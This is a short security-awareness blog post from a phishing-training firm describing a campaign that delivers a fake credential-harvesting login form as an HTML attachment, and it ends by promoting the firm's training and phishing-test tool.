A crafty scammer is currently running a phishing campaign which delivers a fake landing page within an HTML attachment instead of redirecting you to an external site.
Traditionally, a phishing email designed to steal user credentials contains a link which the victim is encouraged to click on, usually stating that something bad will happen if the link is ignored.
Once clicked, the link redirects them to a web site with a login form which subtly saves the entered details to a database or in some cases sends them directly to the hacker.
For the educated eye, these techniques are usually quite simple to spot, grammatical mistakes or links to suspicious, non-official websites are easy clues that you may be dealing with a malicious email. In an attempt to reduce user-suspicion the hacker in this case brings the landing page straight to you, without the need to follow any odd-looking redirects.
When executed by the user opening the HTML file, the code creates a clean-looking login form with the ability to “select your email provider” from a long drop-down list.
The locally-generated phishing form
A somewhat lazy final page
The rapid increase in hackers’ ingenuity further demonstrates a serious need for user education. Without Security Awareness Training, this campaign and many like it prove very successful for the social engineers creating them.
At Phishing Tackle, we work diligently to educate our readers and customers on the dangers of these new and improving campaigns.
We even went as far as to create a tool which shows users how many of their users would fall for a simple phishing attack, information which is invaluable to decision makers when apportioning cyber security budgets. Have a look for yourself and see how many of your users are Click-Prone®.
Don’t procrastinate, educate.